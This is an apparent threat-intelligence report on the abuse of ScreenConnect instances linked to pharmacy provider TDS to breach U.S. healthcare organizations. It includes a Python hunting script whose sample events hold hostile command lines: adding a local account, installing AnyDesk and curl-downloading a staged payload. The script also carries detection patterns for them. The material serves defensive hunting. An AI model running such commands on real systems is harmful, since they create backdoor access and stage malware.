Overview
A targeted cyber-attack involving the abuse of the ScreenConnect remote access tool has been identified, impacting multiple healthcare organizations in the U.S. Notably, the threat actors exploited local ScreenConnect instances affiliated with Transaction Data Systems (TDS), a comprehensive pharmacy supply chain and management systems provider. The attacks were detected between October 28 and November 8, 2023, with ongoing activity raising concerns. The assailants, identified by Huntress, a managed security research organization, demonstrated advanced tactics, installing additional tools like AnyDesk to maintain persistent access.
The attackers first downloaded a payload named text.xml on every affected host, the same file across victims pointing to a single actor or shared playbook. This payload, laden with C# code, discreetly loaded the Metasploit payload Meterpreter into system memory, avoiding PowerShell (a common trigger for endpoint detection) to evade notice. Further, processes were launched through the Print Spooler service, and the compromised endpoints were running Windows Server 2019.
The common thread among the affected organizations was the presence of a ScreenConnect instance tied to the 'rs.tdsclinical[.]com' domain associated with TDS. The remote access tool facilitated the installation of additional payloads, command execution, file transfers, and attempted creation of new user accounts for sustained access.
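As an added example (not code from the page or from Huntress), the chain described above can be expressed as simple hunt logic over process-creation telemetry: a shell spawned by the ScreenConnect client, an unexpected child of the Print Spooler, local account creation, a secondary remote-access tool, and the staged payload name. The event records, the ScreenConnect client path, the spooler allow-list and the download URL are constructed assumptions.

```python
import re

# Constructed process-creation events shaped after the chain described above;
# they are sample data for this example, not telemetry from the incident.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\System32\spoolsv.exe",
     "image": r"C:\Windows\System32\splwow64.exe", "cmdline": "splwow64.exe"},
    {"parent": r"C:\Windows\System32\spoolsv.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c start C:\ProgramData\AnyDesk.exe --install"},
    {"parent": r"C:\Program Files (x86)\ScreenConnect Client (abc123)\ScreenConnect.ClientService.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c net user svc_backup P@ss /add"},
    {"parent": r"C:\Program Files (x86)\ScreenConnect Client (abc123)\ScreenConnect.ClientService.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c curl http://example.invalid/text.xml -o C:\ProgramData\text.xml"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe"},
]

# Children the Print Spooler is assumed to start legitimately; anything else merits a look.
SPOOLER_EXPECTED = {"splwow64.exe", "printisolationhost.exe", "printfilterpipelinesvc.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "rundll32.exe", "mshta.exe"}
ACCOUNT_ADD = re.compile(r"\bnet1?\s+(user|localgroup)\b.*\s/add\b", re.I)
REMOTE_TOOL = re.compile(r"anydesk", re.I)
STAGED_PAYLOAD = re.compile(r"text\.xml", re.I)  # filename from the report; weak on its own


def basename(path):
    """Lower-cased final path component of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the detection labels that apply to one process-creation event."""
    parent, child, cmd = basename(event["parent"]), basename(event["image"]), event["cmdline"]
    labels = []
    if parent == "spoolsv.exe" and child not in SPOOLER_EXPECTED:
        labels.append("spooler-unexpected-child")
    if parent.startswith("screenconnect.") and child in SHELLS:
        labels.append("screenconnect-shell")
    if ACCOUNT_ADD.search(cmd):
        labels.append("account-creation")
    if REMOTE_TOOL.search(cmd):
        labels.append("secondary-remote-tool")
    if STAGED_PAYLOAD.search(cmd):
        labels.append("staged-payload-name")
    return labels


def hunt(events):
    """Map event index -> labels for every event that triggered at least one label."""
    results = {i: classify(e) for i, e in enumerate(events)}
    return {i: labels for i, labels in results.items() if labels}
```

Events that carry two labels (a spooler child that also installs AnyDesk, a ScreenConnect shell that adds a user) are the ones to triage first.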
Response and Recovery
Huntress observed the installation of additional tools and attempts to create user accounts. TDS, which now operates as 'Outcomes' following a recent merger, has been notified but has not responded. Clarity on the effectiveness of TDS's incident response plan is pending, as they have made no effort to contact the Huntress research team regarding this incident. It is unknown whether stakeholders have been informed about this incident, which may cause reputational damage and compromise the trust of customers.
Recommendations
There is an ever-present need for the Healthcare industry to be proactive about cybersecurity measures, collaborative threat intelligence sharing, and swift incident response. Healthcare and pharmaceutical executives must prioritize a comprehensive review of their organization's security posture to prevent future incidents of a similar nature.
Specifically, immediate actions to enhance the security of ScreenConnect instances must be taken. These include scrutinizing and securing remote access tools, conducting thorough reviews of security protocols and incident response plans, enhancing employee training to recognize and report potential security threats, and utilizing a team of experts that proactively hunts for threats within an organization's systems.